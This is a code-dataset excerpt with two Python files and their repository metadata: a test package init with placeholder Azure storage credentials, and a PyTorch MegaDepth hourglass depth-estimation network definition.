a4116c3b03efcc9ad286c3ea1aec0851e3a7d4c6 | 119 | py | Python | tests/__init__.py | RobertoPrevato/azure-storage-python | fae8ed9916095cc1fc17ada44e6406f96f7bd11d | [
"Apache-2.0"
] | 5 | 2018-03-21T12:59:53.000Z | 2020-11-30T12:24:18.000Z | tests/__init__.py | RobertoPrevato/azure-storage-python | fae8ed9916095cc1fc17ada44e6406f96f7bd11d | [
"Apache-2.0"
] | null | null | null | tests/__init__.py | RobertoPrevato/azure-storage-python | fae8ed9916095cc1fc17ada44e6406f96f7bd11d | [
"Apache-2.0"
] | 3 | 2018-10-09T18:35:19.000Z | 2019-03-13T09:43:02.000Z | __import__('pkg_resources').declare_namespace(__name__)
ACCOUNT_NAME = '<ACCOUNT_NAME>'
ACCOUNT_KEY = '<ACCOUNT_KEY>' | 29.75 | 56 | 0.789916 | 15 | 119 | 5.4 | 0.6 | 0.407407 | 0.37037 | 0.54321 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 119 | 4 | 57 | 29.75 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0.336134 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.333333 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
a43feedc239ab8b78089b8c5054d41f787f4e777 | 49,799 | py | Python | ove/algorithm/dain/networks/MegaDepth.py | iBobbyTS/OpenVideoEnhance | 64d12d7a4c344798e5d60eafd20f8f554f852e84 | [
"MIT"
] | 3 | 2020-12-20T14:15:19.000Z | 2021-03-23T12:23:38.000Z | ove/algorithm/dain/networks/MegaDepth.py | iBobbyTS/OpenVideoEnhance | 64d12d7a4c344798e5d60eafd20f8f554f852e84 | [
"MIT"
] | 1 | 2022-01-17T06:39:20.000Z | 2022-01-18T08:12:38.000Z | ove/algorithm/dain/networks/MegaDepth.py | iBobbyTS/OpenVideoEnhance | 64d12d7a4c344798e5d60eafd20f8f554f852e84 | [
"MIT"
] | 1 | 2021-03-03T22:53:05.000Z | 2021-03-03T22:53:05.000Z | import torch
import torch.nn as nn
from functools import reduce
from ove.utils.modeling import Sequential
class LambdaBase(Sequential):
def __init__(self, fn, *args):
super(LambdaBase, self).__init__(*args)
self.lambda_func = fn
def forward_prepare(self, input):
output = []
for module in self._modules.values():
output.append(module(input))
return output if output else input
class Lambda(LambdaBase):
def forward(self, input):
return self.lambda_func(self.forward_prepare(input))
class LambdaMap(LambdaBase):
def forward(self, input):
return list(map(self.lambda_func, self.forward_prepare(input)))
class LambdaReduce(LambdaBase):
def forward(self, input):
return reduce(self.lambda_func, self.forward_prepare(input))
def LA(x):
return x
def LB(x, y, dim=1):
return torch.cat((x, y), dim)
def LC(x, y):
return x + y
HourGlass = Sequential( # Sequential,
nn.Conv2d(3, 128, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
Sequential( # Sequential
LambdaMap(
LA, # ConcatTable
Sequential( # Sequential
nn.MaxPool2d((2, 2), (2, 2)),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
Sequential( # Sequential
LambdaMap(
LA, # ConcatTable
Sequential( # Sequential
nn.MaxPool2d((2, 2), (2, 2)),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
Sequential( # Sequential
LambdaMap(
LA, # ConcatTable
Sequential( # Sequential
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (11, 11), (1, 1), (5, 5)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
),
Sequential( # Sequential
nn.AvgPool2d((2, 2), (2, 2)),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
Sequential( # Sequential
LambdaMap(
LA, # ConcatTable
Sequential( # Sequential
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
),
Sequential( # Sequential
nn.AvgPool2d((2, 2), (2, 2)),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
nn.UpsamplingNearest2d(scale_factor=2),
),
),
LambdaReduce(LC), # CAddTable
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential,
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
)
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, (11, 11), (1, 1), (5, 5)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
nn.UpsamplingNearest2d(scale_factor=2),
),
),
LambdaReduce(LC) # CAddTable
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(256, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
nn.UpsamplingNearest2d(scale_factor=2)
),
Sequential( # Sequential
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (11, 11), (1, 1), (5, 5)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
),
),
LambdaReduce(LC), # CAddTable
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (5, 5), (1, 1), (2, 2)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 16, (1, 1)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential,
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 16, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 16, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 32, (1, 1)),
nn.BatchNorm2d(32, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(32, 16, (11, 11), (1, 1), (5, 5)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
nn.UpsamplingNearest2d(scale_factor=2)
),
Sequential( # Sequential
LambdaReduce(
LB, # Concat
Sequential( # Sequential
nn.Conv2d(128, 16, (1, 1)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 16, (3, 3), (1, 1), (1, 1)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 16, (7, 7), (1, 1), (3, 3)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
Sequential( # Sequential
nn.Conv2d(128, 64, (1, 1)),
nn.BatchNorm2d(64, 1e-05, 0.1, False),
nn.ReLU(inplace=True),
nn.Conv2d(64, 16, (11, 11), (1, 1), (5, 5)),
nn.BatchNorm2d(16, 1e-05, 0.1, False),
nn.ReLU(inplace=True)
),
),
),
),
LambdaReduce(LC) # CAddTable
),
nn.Conv2d(64, 1, (3, 3), (1, 1), (1, 1))
)
| 61.939055 | 102 | 0.254724 | 3,528 | 49,799 | 3.589569 | 0.020975 | 0.031901 | 0.159112 | 0.20807 | 0.96494 | 0.96494 | 0.956175 | 0.953253 | 0.944488 | 0.944488 | 0 | 0.15646 | 0.650134 | 49,799 | 803 | 103 | 62.016189 | 0.570395 | 0.027209 | 0 | 0.950382 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010178 | false | 0 | 0.005089 | 0.007634 | 0.029262 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
